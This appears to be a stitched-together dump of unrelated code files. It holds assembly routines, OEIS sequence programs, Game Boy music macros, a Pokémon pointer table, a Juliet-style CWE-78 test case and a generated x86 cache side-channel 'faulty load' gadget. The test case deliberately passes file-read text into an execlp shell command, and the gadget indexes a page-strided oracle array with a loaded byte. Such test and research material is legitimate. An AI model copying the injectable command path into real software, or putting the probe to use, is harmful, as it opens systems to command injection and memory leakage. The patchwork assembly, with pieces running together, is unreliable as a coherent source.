%ifidn __OUTPUT_FORMAT__,elf32
section .note.GNU-stack noalloc noexec nowrite progbits
section .text
%elifidn __OUTPUT_FORMAT__,elf64
section .note.GNU-stack noalloc noexec nowrite progbits
section .text
%elifidn __OUTPUT_FORMAT__,elfx32
section .note.GNU-stack noalloc noexec nowrite progbits
section .text
%endif
|
; is string a valid alpha lower string 12/02-92 O.Fink
section string
include win1_keys_err
xdef st_isalc ; is character alpha lower
xdef st_isals ; is string alpha lower
;+++
; is character alpha lower character
;
; Entry Exit
; d1.b character preserved
;
; error codes: err.nc not an alpha lower character
; condition codes set
;---
st_isalc
moveq #err.nc,d0 ; preset the error code
cmpi.b #'a',d1 ; below 'a'? (signed compare, so bytes >= $80 are rejected here too)
blt.s c_exit
cmpi.b #'z',d1 ; above 'z'?
bhi.s c_exit
moveq #0,d0 ; within 'a'..'z': success
c_exit
tst.l d0 ; set condition codes on the result for the caller
rts
;+++
; is string alpha lower
;
; Entry Exit
; a0 ptr to string preserved
;
;
; error codes: err.nc not an alpha lower string (empty strings included)
; condition codes set
;---
r_isals reg a0/d1/d2 ; registers preserved across st_isals
st_isals
movem.l r_isals,-(sp)
moveq #err.nc,d0 ; preset error; an empty string exits with it below
move.w (a0)+,d2 ; string starts with a word holding the character count
beq.s s_exit
bra.s s_end ; jump into the dbra so d2 counts exactly the characters present
s_lp
move.b (a0)+,d1
bsr st_isalc ; reuse the single-character test above
bne.s s_exit ; first non-lowercase character aborts with err.nc still in d0
s_end
dbra d2,s_lp
s_exit
movem.l (sp)+,r_isals
tst.l d0 ; set condition codes on the result
rts
end
|
; A128496: Row sums of unsigned triangle |A128495|=|S(2;n,m)| (sums of squares of Chebyshev's S-polynomials).
; 1,2,4,9,20,50,125,324,840,2195,5736,15012,39289,102854,269260,704925,1845500,4831574,12649205,33116040,86698896,226980647,594243024,1555748424,4073002225,10663258250,27916772500,73087059249,191344405220
mov $1,2
add $1,$0
div $1,2 ; $1 = floor((n+2)/2), the base term of the sum
lpb $0
mov $2,$0
trn $0,2 ; truncated subtraction: $0 = max($0 - 2, 0), so every other index is visited
seq $2,1654 ; Golden rectangle numbers: F(n)*F(n+1), where F(n) = A000045(n) (Fibonacci numbers).
add $1,$2 ; accumulate the golden-rectangle terms
lpe
mov $0,$1 ; result in $0
|
; A037156: 10^n*(10^n+1)/2.
; 1,55,5050,500500,50005000,5000050000,500000500000,50000005000000,5000000050000000,500000000500000000,50000000005000000000,5000000000050000000000,500000000000500000000000
mov $1,10
pow $1,$0 ; $1 = 10^n
add $1,1 ; $1 = 10^n + 1
bin $1,2 ; $1 = C(10^n+1, 2) = 10^n*(10^n+1)/2
mov $0,$1 ; result in $0
|
; A273409: Partial sums of the number of active (ON,black) cells in n-th stage of growth of two-dimensional cellular automaton defined by "Rule 678", based on the 5-celled von Neumann neighborhood.
; 1,6,11,28,37,66,87,152,177,254,291,404,453,602,687,944,1033,1302,1403,1708,1821,2162,2311,2760,2921,3406,3603,4196,4429,5130,5471,6496,6841,7878,8235,9308,9677,10786,11191,12408,12825,14078,14531,15892,16381,17850,18447,20240,20849,22678,23323,25260,25941,27986,28775,31144,31969,34446,35379,38180,39221,42346,43711,47808,49177,53286,54667,58812,60205,64386,65815,70104,71545,75870,77347,81780,83293,87834,89455,94320,95953,100854,102523,107532,109237,114354,116167,121608,123457,129006,130963,136836,138901,145098,147487,154656,157057,164262,166699,174012
lpb $0 ; partial sums: add the companion sequence's term for k = n, n-1, ..., 1
mov $2,$0
sub $0,1
seq $2,79317 ; Number of ON cells after n generations of cellular automaton on square grid in which cells which share exactly one edge with an ON cell change their state.
add $1,$2 ; accumulate
lpe
add $1,1 ; account for the initial stage's single ON cell
mov $0,$1 ; result in $0
|
; Graphics glue for MODE 1: publishes xor_MODE1 and assembles the shared
; per-mode pixel routine with its XOR plot variant selected.
SECTION code_clib
PUBLIC xor_MODE1
.xor_MODE1
defc NEEDxor = 1 ; tells pixel_MODE1.inc to emit the XOR drawing path
INCLUDE "target/gal/graphics/pixel_MODE1.inc"
|
.section .text.entry # placed first by linker.ld, so this code sits at the very start of .text (the kernel image entry, 0x8020000 per the original note)
.globl _start # global symbol _start; linker.ld designates it as the entry point of the whole OS image
_start:
la sp, boot_stack_top # initialize the stack pointer to the top of the boot stack
call rust_main # stack is ready; transfer control to the Rust entry point
.section .bss.stack # the stack is placed in the low part of .bss as arranged by linker.ld
.globl boot_stack # boot_stack marks the bottom of the stack
boot_stack:
.space 4096*16 # 64 KiB of stack space; the stack grows downward toward boot_stack
.globl boot_stack_top
boot_stack_top:
version https://git-lfs.github.com/spec/v1
oid sha256:2d9f170fdecb359c434387e6379fe5f16f9ffc77ef8dc4ba111ca517c3359023
size 42185
|
; int vfprintf(FILE *fp, unsigned char *fmt,void *ap)
;
; sccz80 wrapper: pops the caller's three arguments, pushes them back so the
; caller's stack frame is untouched, then rebuilds the five-argument frame
; expected by the shared formatting core asm_printf (fp, output_fn, sccz80
; flag, fmt, ap) with fputc_callee as the character sink.
MODULE vfprintf
SECTION code_clib
PUBLIC vfprintf
EXTERN fputc_callee
EXTERN asm_printf
; Cores have signature (in __smallc)
; int vfprintf1(FILE *fp, void (*output_fn)(FILE *fp,int c), int sccz80, unsigned char *fmt,void *ap)
; sccz80
vfprintf:
pop af ; return address
pop hl ; ap
pop de ; fmt
pop bc ; fp
push bc ; restore the caller's arguments and return address unchanged
push de
push hl
push af
IF !__CPU_INTEL__
push ix ; preserve frame register (ix does not exist on 8080/8085)
ENDIF
push bc ;fp
ld bc,fputc_callee ;output_fn
push bc
ld bc,1 ;sccz80
push bc
push de ;fmt
push hl ;ap
call asm_printf ; shared formatting core; result comes back in HL
pop bc ; drop the five arguments pushed for asm_printf
pop bc
pop bc
pop bc
pop bc
IF !__CPU_INTEL__
pop ix
ENDIF
ret
|
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE78_OS_Command_Injection__wchar_t_file_execlp_72a.cpp
Label Definition File: CWE78_OS_Command_Injection.strings.label.xml
Template File: sources-sink-72a.tmpl.cpp
*/
/*
* @description
* CWE: 78 OS Command Injection
* BadSource: file Read input from a file
* GoodSource: Fixed string
* Sinks: execlp
* BadSink : execute command with wexeclp
* Flow Variant: 72 Data flow: data passed in a vector from one function to another in different source files
*
* */
#include "std_testcase.h"
#include <vector>
#include <wchar.h>
#ifdef _WIN32
#define COMMAND_INT_PATH L"%WINDIR%\\system32\\cmd.exe"
#define COMMAND_INT L"cmd.exe"
#define COMMAND_ARG1 L"/c"
#define COMMAND_ARG2 L"dir "
#define COMMAND_ARG3 data
#else /* NOT _WIN32 */
#include <unistd.h>
#define COMMAND_INT_PATH L"/bin/sh"
#define COMMAND_INT L"sh"
#define COMMAND_ARG1 L"-c"
#define COMMAND_ARG2 L"ls "
#define COMMAND_ARG3 data
#endif
#ifdef _WIN32
#define FILENAME "C:\\temp\\file.txt"
#else
#define FILENAME "/tmp/file.txt"
#endif
using namespace std;
namespace CWE78_OS_Command_Injection__wchar_t_file_execlp_72
{
#ifndef OMITBAD
/* bad function declaration */
void badSink(vector<wchar_t *> dataVector);
/* bad: `data` is seeded with the fixed command prefix, then potentially
 * tainted with a line read from FILENAME, and finally passed (via a vector,
 * flow variant 72) to badSink(), which executes it. This is the testcase's
 * intentionally flawed path — the flaw markers below must stay as-is. */
void bad()
{
    wchar_t * data;
    vector<wchar_t *> dataVector;
    wchar_t dataBuffer[100] = COMMAND_ARG2; /* L"dir " on Windows, L"ls " elsewhere */
    data = dataBuffer;
    {
        /* Read input from a file */
        size_t dataLen = wcslen(data);
        FILE * pFile;
        /* if there is room in data, attempt to read the input from a file */
        if (100-dataLen > 1)
        {
            pFile = fopen(FILENAME, "r");
            if (pFile != NULL)
            {
                /* POTENTIAL FLAW: Read data from a file */
                if (fgetws(data+dataLen, (int)(100-dataLen), pFile) == NULL)
                {
                    printLine("fgetws() failed");
                    /* Restore NUL terminator if fgetws fails */
                    data[dataLen] = L'\0';
                }
                fclose(pFile);
            }
        }
    }
    /* Put data in a vector */
    /* All three slots alias the same stack buffer on purpose. */
    dataVector.insert(dataVector.end(), 1, data);
    dataVector.insert(dataVector.end(), 1, data);
    dataVector.insert(dataVector.end(), 1, data);
    badSink(dataVector);
}
#endif /* OMITBAD */
#ifndef OMITGOOD
/* good function declarations */
/* goodG2B uses the GoodSource with the BadSink */
void goodG2BSink(vector<wchar_t *> dataVector);
/* goodG2B: same sink as bad(), but the appended text is a fixed literal
 * rather than external input, so no injection is possible. */
static void goodG2B()
{
    wchar_t * data;
    vector<wchar_t *> dataVector;
    wchar_t dataBuffer[100] = COMMAND_ARG2; /* L"dir " on Windows, L"ls " elsewhere */
    data = dataBuffer;
    /* FIX: Append a fixed string to data (not user / external input) */
    wcscat(data, L"*.*");
    /* Put data in a vector */
    dataVector.insert(dataVector.end(), 1, data);
    dataVector.insert(dataVector.end(), 1, data);
    dataVector.insert(dataVector.end(), 1, data);
    goodG2BSink(dataVector);
}
/* good: public entry point exercising the fixed-string (GoodSource) variant. */
void good()
{
    goodG2B();
}
#endif /* OMITGOOD */
} /* close namespace */
/* Below is the main(). It is only used when building this testcase on
* its own for testing or for building a binary to use in testing binary
* analysis tools. It is not used when compiling all the testcases as one
* application, which is how source code analysis tools are tested.
*/
#ifdef INCLUDEMAIN
using namespace CWE78_OS_Command_Injection__wchar_t_file_execlp_72; /* so that we can use good and bad easily */
/* Standalone driver: runs the good then bad flows, each omittable via the
 * OMITGOOD / OMITBAD build flags. Only compiled when INCLUDEMAIN is set. */
int main(int argc, char * argv[])
{
    /* seed randomness */
    srand( (unsigned)time(NULL) );
#ifndef OMITGOOD
    printLine("Calling good()...");
    good();
    printLine("Finished good()");
#endif /* OMITGOOD */
#ifndef OMITBAD
    printLine("Calling bad()...");
    bad();
    printLine("Finished bad()");
#endif /* OMITBAD */
    return 0;
}
#endif
|
// Generated buffer-preparation routine: touches several memory-type regions
// (UC/WC/WT/normal heap-tracked buffers) with stores, loads and rep-moves to
// put caches/buffers in a known state before the faulty load below. The nop
// runs and register self-ops are generator padding; instruction order is
// intentional — keep byte-identical. Clobbers flags; all pushed registers
// are restored before returning.
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %r15
push %r9
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x1272e, %rdi
nop
cmp %r9, %r9
movl $0x61626364, (%rdi) // 4-byte store to the UC region
nop
nop
nop
nop
nop
add %rbx, %rbx
lea addresses_WC_ht+0x1ae3a, %rbx
nop
nop
nop
nop
nop
inc %r10
movw $0x6162, (%rbx) // 2-byte store to the WC region
nop
nop
add %rcx, %rcx
lea addresses_WT_ht+0x12206, %r15
nop
add $31257, %r13
mov (%r15), %bx // 2-byte load from the WT region
xor $24203, %rbx
lea addresses_A_ht+0x17f2e, %rsi
lea addresses_WC_ht+0xa962, %rdi
clflush (%rsi) // evict the source line before the copy
nop
inc %r9
mov $36, %rcx
rep movsw // copy 36 words A_ht -> WC_ht
nop
nop
xor %rsi, %rsi
lea addresses_D_ht+0x193be, %r9
nop
nop
nop
nop
nop
add $49085, %rbx
mov $0x6162636465666768, %r13
movq %r13, (%r9) // 8-byte store to the D region
nop
nop
nop
nop
add %rsi, %rsi
lea addresses_WT_ht+0x7b2e, %rsi
lea addresses_normal_ht+0x1a72e, %rdi
nop
xor %r9, %r9
mov $43, %rcx
rep movsq // copy 43 qwords WT_ht -> normal_ht
nop
nop
nop
add %r15, %r15
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r9
pop %r15
pop %r13
pop %r10
ret
// Generated faulty-load gadget: loads 16 bytes from the US region, extracts
// one byte of the value, and uses it to index the `oracles` array with a
// 4 KiB (page) stride — presumably a cache side-channel probe whose set is
// later timed by the harness (TODO confirm against the generator's docs).
// All pushed registers are restored; flags are clobbered.
.global s_faulty_load
s_faulty_load:
push %r11
push %r13
push %rbp
push %rdi
push %rdx
// Faulty Load
lea addresses_US+0x14f2e, %rbp
nop
nop
nop
nop
nop
and %rdx, %rdx
movups (%rbp), %xmm3 // unaligned 16-byte load — the "faulty" access
vpextrq $0, %xmm3, %r11 // take the low qword of the loaded value
lea oracles, %rdi
and $0xff, %r11 // keep one byte...
shlq $12, %r11 // ...and scale by 4096 so each value maps to its own page
mov (%rdi,%r11,1), %r11 // touch oracles[byte << 12], leaving a cache footprint
pop %rdx
pop %rdi
pop %rbp
pop %r13
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_US', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_US', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 6, 'same': True}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WT_ht', 'size': 2, 'AVXalign': False, 'NT': True, 'congruent': 3, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 9, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 2, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WT_ht', 'congruent': 10, 'same': False}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 9, 'same': False}}
{'00': 9}
00 00 00 00 00 00 00 00 00
*/
|
; A065760: Concatenation of increasing number of alternating digits in base 2, starting with 1.
; Submitted by Jon Maiga
; 1,4,39,624,19999,1279936,163831935,41940975360,21473779384831,21989150090066944,45033779384457103359,184458360358736295358464,1511082888058767731576545279,24757582037954850514150117851136,811256448219704541647671061746057215,53166502590526556841421770702589605642240,6968639827545496858318834329529824790739812351,1826787118952086728427132506480266389943697368940544,957762565021151646673604447557525905050801206167100456959,1004286839379619109062421457202080283414548925557873528756240384
add $0,1
mov $2,$0
mov $4,1
lpb $2 ; one pass per appended digit group
mul $4,2 ; $4 = 2^k, width of the next group
mul $1,$4 ; shift the accumulated value left by that width
mov $3,$4
sub $3,1 ; $3 = 2^k - 1, the all-ones pattern of the group
cmp $5,0 ; toggle $5 between 1 and 0 each pass (alternating digit value)
mul $3,$5
add $1,$3 ; append the group only on alternating passes
sub $2,1
lpe
mov $0,$1 ; result in $0
|
; $Id: ASMBitFirstSet.asm 69111 2017-10-17 14:26:02Z vboxsync $
;; @file
; IPRT - ASMBitFirstSet().
;
;
; Copyright (C) 2006-2017 Oracle Corporation
;
; This file is part of VirtualBox Open Source Edition (OSE), as
; available from http://www.virtualbox.org. This file is free software;
; you can redistribute it and/or modify it under the terms of the GNU
; General Public License (GPL) as published by the Free Software
; Foundation, in version 2 as it comes in the "COPYING" file of the
; VirtualBox OSE distribution. VirtualBox OSE is distributed in the
; hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
;
; The contents of this file may alternatively be used under the terms
; of the Common Development and Distribution License Version 1.0
; (CDDL) only, as it comes in the "COPYING.CDDL" file of the
; VirtualBox OSE distribution, in which case the provisions of the
; CDDL are applicable instead of those of the GPL.
;
; You may elect to license modified versions of this file under the
; terms and conditions of either the GPL or the CDDL or both.
;
;*******************************************************************************
;* Header Files *
;*******************************************************************************
%include "iprt/asmdefs.mac"
BEGINCODE
;;
; Finds the first set bit in a bitmap.
;
; @returns (32/64:eax, 16:ax+dx) Index of the first set bit.
; @returns (32/64:eax, 16:ax+dx) -1 if no set bit was found.
; @param msc:rcx gcc:rdi pvBitmap Pointer to the bitmap.
; @param msc:edx gcc:rsi cBits The number of bits in the bitmap. Multiple of 32.
;
BEGINPROC_EXPORTED ASMBitFirstSet
;
; if (cBits)
; Put cBits in ecx first.
;
%if ARCH_BITS == 64
%ifdef ASM_CALL64_GCC
mov ecx, esi
%else
xchg rcx, rdx ; rdx=pvDst, ecx=cBits
%endif
%elif ARCH_BITS == 32
mov ecx, [esp + 4 + 4]
%elif ARCH_BITS == 16
push bp
mov bp, sp
mov ecx, [bp + 4 + 4]
%endif
or ecx, ecx
jz short .failed
;{
push xDI
; asm {...}
%if ARCH_BITS == 64
%ifdef ASM_CALL64_GCC
; rdi = start of scasd - already done
%else
mov rdi, rdx ; rdi = start of scasd (Note! xchg rdx,rcx above)
%endif
%elif ARCH_BITS == 32
mov edi, [esp + 4]
%elif ARCH_BITS == 16
mov ax, [bp + 4 + 2]
mov di, [bp + 4]
mov es, ax ; es is volatile, no need to save.
%endif
add ecx, 31 ; 32 bit aligned
shr ecx, 5 ; number of dwords to scan.
mov xDX, xDI ; xDX = saved pvBitmap
xor eax, eax
repe scasd ; Scan for the first dword with any bit set.
je .failed_restore
; find the bit in question
sub xDI, 4 ; one step back.
%if ARCH_BITS == 16
movzx edi, di
mov eax, [es:xDI]
%else
mov eax, [xDI]
%endif
sub xDI, xDX
shl edi, 3 ; calc bit offset.
bsf ecx, eax
jz .failed_restore ; race paranoia
add ecx, edi
mov eax, ecx
; return success
pop xDI
%if ARCH_BITS == 16
mov edx, eax
shr edx, 16
leave
%endif
ret
; failure
;}
;return -1;
.failed_restore:
pop xDI
.failed:
%if ARCH_BITS != 16
mov eax, 0ffffffffh
%else
mov ax, 0ffffh
mov dx, ax
leave
%endif
ret
ENDPROC ASMBitFirstSet
|
; Music struct
RSRESET
CTRL_BYTE RB 1 ; Bit 0: Active (0: Off 1: On)
; Bit 1: Muted (0: Off 1: On)
WAITING_TIME RW 1
CURRENT_ELEM_PTR RW 1
NB_REGISTERS RB 1
REGISTERS_PTR RW 1
FREQUENCY_PTR RW 1
NB_REPEAT RB 1
REPEAT_PTR RW 1
MUSIC_STRUCT_SIZE RB 1
; Music
SEMIQUAVER EQU $3
QUAVER EQU 2 * SEMIQUAVER
DOTTED_QUAVER EQU QUAVER + SEMIQUAVER
CROTCHET EQU 2 * QUAVER
DOTTED_CROTCHET EQU 2 * DOTTED_QUAVER
MINIM EQU 2 * CROTCHET
DOTTED_MINIM EQU 2 * DOTTED_CROTCHET
SEMIBREVE EQU 2 * MINIM
DOTTED_SEMIBREVE EQU 2 * DOTTED_MINIM
QUAVER3 EQU CROTCHET / 3
SEMIQUAVER3 EQU QUAVER3 / 2
; Notes
NOTE_Cb EQU 247
NOTE_C EQU 262
NOTE_C_SHARP EQU 277
NOTE_Db EQU 277
NOTE_D EQU 294
NOTE_D_SHARP EQU 311
NOTE_Eb EQU 311
NOTE_E EQU 330
NOTE_Fb EQU 330
NOTE_E_SHARP EQU 349
NOTE_F EQU 349
NOTE_F_SHARP EQU 370
NOTE_Gb EQU 370
NOTE_G EQU 392
NOTE_G_SHARP EQU 415
NOTE_Ab EQU 415
NOTE_A EQU 440
NOTE_A_SHARP EQU 466
NOTE_Bb EQU 466
NOTE_B EQU 494
NOTE_B_SHARP EQU 524
; Music No Sound
TERMINAL_ONE EQU %00010001
TERMINAL_TWO EQU %00100010
TERMINAL_THREE EQU %01000100
TERMINAL_FOUR EQU %10001000
; Music header
RSRESET
TIMER_MODULO RB 1
TIMER_CONTROL RB 1
NB_PROGRAMS RB 1
PROGRAMS_PTRS RB 1
; Music commands
RSRESET
SET_FREQU RB 1
SET_VOL RB 1
WAIT RB 1
JUMP RB 1
DIS_TERM RB 1
ENA_TERM RB 1
SET_REGISTERS RB 1
STOP_MUS RB 1
PLAY RB 1
REPEAT RB 1
CONTINUE RB 1
continue: MACRO
db CONTINUE
ENDM
repeat: MACRO
db REPEAT
db \1 - 1
ENDM
play: MACRO
db PLAY
db ((2048 - 131072 / (\1)) >> 8) | (\2)
ENDM
playRaw: MACRO
db PLAY
db \1
ENDM
setFrequency: MACRO ; setFrequency(byte frequency)
ASSERT (2048 - 131072 / (\1)) > 0
db SET_FREQU
dw (2048 - 131072 / (\1)) | ((\2)) << 8
ENDM
setFrequencyRaw: MACRO ; setFrequency(byte frequency)
db SET_FREQU
dw (\1) | ((\2)) << 8
ENDM
setVolume: MACRO ; setVolume(byte volume)
db SET_VOL
db \1
ENDM
setRegisters: MACRO ; setRegisters(byte values[nbRegisters])
db SET_REGISTERS
IF _NARG == 4
db \1, \2, \3, \4
ELIF _NARG == 5
db \1, \2, \3, \4, \5
ELSE
PRINTT "setRegister should take either 4 or 5 arguments but "
PRINTI _NARG
PRINTT " were given."
FAIL
ENDC
ENDM
disableTerminals: MACRO ; disableTerminals(byte terminalsMask)
db DIS_TERM
db ~(\1)
ENDM
enableTerminals: MACRO ; enableTerminals(byte terminalsMask)
db ENA_TERM
db \1
ENDM
wait: MACRO ; wait(unsigned short units)
db WAIT
dw ((\1) + $100)
ENDM
jump: MACRO ; jump(unsigned addr)
db JUMP
dw \1
ENDM
stopMusic: MACRO ; stopMusic()
db STOP_MUS
ENDM
writeRegisterI: MACRO ; writeRegisterI(reg) - write reg via the mirror page, then to [hl] with post-increment
push hl
ld h, Channel1Mirror >> 8 ; same low byte, mirror high byte: update the shadow copy first
ld [hl], \1
pop hl
ldi [hl], \1 ; write the real target and advance hl
ENDM
writeRegister: MACRO ; writeRegister(reg) - like writeRegisterI but without incrementing hl
push hl
ld h, Channel1Mirror >> 8 ; same low byte, mirror high byte: update the shadow copy first
ld [hl], \1
pop hl
ld [hl], \1
ENDM
; A160128: a(n) = number of grid points that are covered after (2^n)th stage of A139250.
; 3,7,19,63,235,919,3651,14575,58267,233031,932083,3728287,14913099,59652343,238609315,954437199,3817748731,15270994855,61083979347,244335917311,977343669163,3909374676567,15637498706179
; Computes a(n) = 4*((2*4^n + 3n) div 9) + 3 (matches the terms listed above).
mov $1,$0  ; $1 = n
mov $2,4
pow $2,$0  ; $2 = 4^n
add $1,$2  ; $1 = n + 4^n
mul $1,2   ; $1 = 2n + 2*4^n
add $1,$0  ; $1 = 3n + 2*4^n
mov $0,$1
div $0,9   ; integer division
mul $0,4
add $0,3   ; result in $0
|
; BitmasksPointers: one dw pointer per species to that species' sprite
; bitmask data, in species order (Gen 1, Gen 2, then Gen 3 entries visible
; here). Presumably indexed by species number - confirm against callers.
BitmasksPointers:
dw BulbasaurBitmasks
dw IvysaurBitmasks
dw VenusaurBitmasks
dw CharmanderBitmasks
dw CharmeleonBitmasks
dw CharizardBitmasks
dw SquirtleBitmasks
dw WartortleBitmasks
dw BlastoiseBitmasks
dw CaterpieBitmasks
dw MetapodBitmasks
dw ButterfreeBitmasks
dw WeedleBitmasks
dw KakunaBitmasks
dw BeedrillBitmasks
dw PidgeyBitmasks
dw PidgeottoBitmasks
dw PidgeotBitmasks
dw RattataBitmasks
dw RaticateBitmasks
dw SpearowBitmasks
dw FearowBitmasks
dw EkansBitmasks
dw ArbokBitmasks
dw PikachuBitmasks
dw RaichuBitmasks
dw SandshrewBitmasks
dw SandslashBitmasks
dw NidoranFBitmasks
dw NidorinaBitmasks
dw NidoqueenBitmasks
dw NidoranMBitmasks
dw NidorinoBitmasks
dw NidokingBitmasks
dw ClefairyBitmasks
dw ClefableBitmasks
dw VulpixBitmasks
dw NinetalesBitmasks
dw JigglypuffBitmasks
dw WigglytuffBitmasks
dw ZubatBitmasks
dw GolbatBitmasks
dw OddishBitmasks
dw GloomBitmasks
dw VileplumeBitmasks
dw ParasBitmasks
dw ParasectBitmasks
dw VenonatBitmasks
dw VenomothBitmasks
dw DiglettBitmasks
dw DugtrioBitmasks
dw MeowthBitmasks
dw PersianBitmasks
dw PsyduckBitmasks
dw GolduckBitmasks
dw MankeyBitmasks
dw PrimeapeBitmasks
dw GrowlitheBitmasks
dw ArcanineBitmasks
dw PoliwagBitmasks
dw PoliwhirlBitmasks
dw PoliwrathBitmasks
dw AbraBitmasks
dw KadabraBitmasks
dw AlakazamBitmasks
dw MachopBitmasks
dw MachokeBitmasks
dw MachampBitmasks
dw BellsproutBitmasks
dw WeepinbellBitmasks
dw VictreebelBitmasks
dw TentacoolBitmasks
dw TentacruelBitmasks
dw GeodudeBitmasks
dw GravelerBitmasks
dw GolemBitmasks
dw PonytaBitmasks
dw RapidashBitmasks
dw SlowpokeBitmasks
dw SlowbroBitmasks
dw MagnemiteBitmasks
dw MagnetonBitmasks
dw FarfetchDBitmasks
dw DoduoBitmasks
dw DodrioBitmasks
dw SeelBitmasks
dw DewgongBitmasks
dw GrimerBitmasks
dw MukBitmasks
dw ShellderBitmasks
dw CloysterBitmasks
dw GastlyBitmasks
dw HaunterBitmasks
dw GengarBitmasks
dw OnixBitmasks
dw DrowzeeBitmasks
dw HypnoBitmasks
dw KrabbyBitmasks
dw KinglerBitmasks
dw VoltorbBitmasks
dw ElectrodeBitmasks
dw ExeggcuteBitmasks
dw ExeggutorBitmasks
dw CuboneBitmasks
dw MarowakBitmasks
dw HitmonleeBitmasks
dw HitmonchanBitmasks
dw LickitungBitmasks
dw KoffingBitmasks
dw WeezingBitmasks
dw RhyhornBitmasks
dw RhydonBitmasks
dw ChanseyBitmasks
dw TangelaBitmasks
dw KangaskhanBitmasks
dw HorseaBitmasks
dw SeadraBitmasks
dw GoldeenBitmasks
dw SeakingBitmasks
dw StaryuBitmasks
dw StarmieBitmasks
dw MrMimeBitmasks
dw ScytherBitmasks
dw JynxBitmasks
dw ElectabuzzBitmasks
dw MagmarBitmasks
dw PinsirBitmasks
dw TaurosBitmasks
dw MagikarpBitmasks
dw GyaradosBitmasks
dw LaprasBitmasks
dw DittoBitmasks
dw EeveeBitmasks
dw VaporeonBitmasks
dw JolteonBitmasks
dw FlareonBitmasks
dw PorygonBitmasks
dw OmanyteBitmasks
dw OmastarBitmasks
dw KabutoBitmasks
dw KabutopsBitmasks
dw AerodactylBitmasks
dw SnorlaxBitmasks
dw ArticunoBitmasks
dw ZapdosBitmasks
dw MoltresBitmasks
dw DratiniBitmasks
dw DragonairBitmasks
dw DragoniteBitmasks
dw MewtwoBitmasks
dw MewBitmasks
dw ChikoritaBitmasks
dw BayleefBitmasks
dw MeganiumBitmasks
dw CyndaquilBitmasks
dw QuilavaBitmasks
dw TyphlosionBitmasks
dw TotodileBitmasks
dw CroconawBitmasks
dw FeraligatrBitmasks
dw SentretBitmasks
dw FurretBitmasks
dw HoothootBitmasks
dw NoctowlBitmasks
dw LedybaBitmasks
dw LedianBitmasks
dw SpinarakBitmasks
dw AriadosBitmasks
dw CrobatBitmasks
dw ChinchouBitmasks
dw LanturnBitmasks
dw PichuBitmasks
dw CleffaBitmasks
dw IgglybuffBitmasks
dw TogepiBitmasks
dw TogeticBitmasks
dw NatuBitmasks
dw XatuBitmasks
dw MareepBitmasks
dw FlaaffyBitmasks
dw AmpharosBitmasks
dw BellossomBitmasks
dw MarillBitmasks
dw AzumarillBitmasks
dw SudowoodoBitmasks
dw PolitoedBitmasks
dw HoppipBitmasks
dw SkiploomBitmasks
dw JumpluffBitmasks
dw AipomBitmasks
dw SunkernBitmasks
dw SunfloraBitmasks
dw YanmaBitmasks
dw WooperBitmasks
dw QuagsireBitmasks
dw EspeonBitmasks
dw UmbreonBitmasks
dw MurkrowBitmasks
dw SlowkingBitmasks
dw MisdreavusBitmasks
dw UnownBitmasks
dw WobbuffetBitmasks
dw GirafarigBitmasks
dw PinecoBitmasks
dw ForretressBitmasks
dw DunsparceBitmasks
dw GligarBitmasks
dw SteelixBitmasks
dw SnubbullBitmasks
dw GranbullBitmasks
dw QwilfishBitmasks
dw ScizorBitmasks
dw ShuckleBitmasks
dw HeracrossBitmasks
dw SneaselBitmasks
dw TeddiursaBitmasks
dw UrsaringBitmasks
dw SlugmaBitmasks
dw MagcargoBitmasks
dw SwinubBitmasks
dw PiloswineBitmasks
dw CorsolaBitmasks
dw RemoraidBitmasks
dw OctilleryBitmasks
dw DelibirdBitmasks
dw MantineBitmasks
dw SkarmoryBitmasks
dw HoundourBitmasks
dw HoundoomBitmasks
dw KingdraBitmasks
dw PhanpyBitmasks
dw DonphanBitmasks
dw Porygon2Bitmasks
dw StantlerBitmasks
dw SmeargleBitmasks
dw TyrogueBitmasks
dw HitmontopBitmasks
dw SmoochumBitmasks
dw ElekidBitmasks
dw MagbyBitmasks
dw MiltankBitmasks
dw BlisseyBitmasks
dw RaikouBitmasks
dw EnteiBitmasks
dw SuicuneBitmasks
dw LarvitarBitmasks
dw PupitarBitmasks
dw TyranitarBitmasks
dw LugiaBitmasks
dw HoOhBitmasks
dw CelebiBitmasks
dw TreeckoBitmasks
dw GrovyleBitmasks
dw SceptileBitmasks
dw TorchicBitmasks
dw CombuskenBitmasks
dw BlazikenBitmasks
dw MudkipBitmasks
dw MarshtompBitmasks
dw SwampertBitmasks
dw PoochyenaBitmasks
dw MightyenaBitmasks
dw ZigzagoonBitmasks
dw LinooneBitmasks
dw WurmpleBitmasks
dw SilcoonBitmasks
dw BeautiflyBitmasks
dw CascoonBitmasks
dw DustoxBitmasks
dw LotadBitmasks
dw LombreBitmasks
dw LudicoloBitmasks
dw SeedotBitmasks
dw NuzleafBitmasks
dw ShiftryBitmasks
dw TaillowBitmasks
dw SwellowBitmasks
dw WingullBitmasks
dw PelipperBitmasks
dw RaltsBitmasks
dw KirliaBitmasks
dw GardevoirBitmasks
dw SurskitBitmasks
dw MasquerainBitmasks
dw ShroomishBitmasks
dw BreloomBitmasks
dw SlakothBitmasks
dw VigorothBitmasks
dw SlakingBitmasks
dw NincadaBitmasks
dw NinjaskBitmasks
dw ShedinjaBitmasks
dw WhismurBitmasks
dw LoudredBitmasks
dw ExploudBitmasks
dw MakuhitaBitmasks
dw HariyamaBitmasks
dw AzurillBitmasks
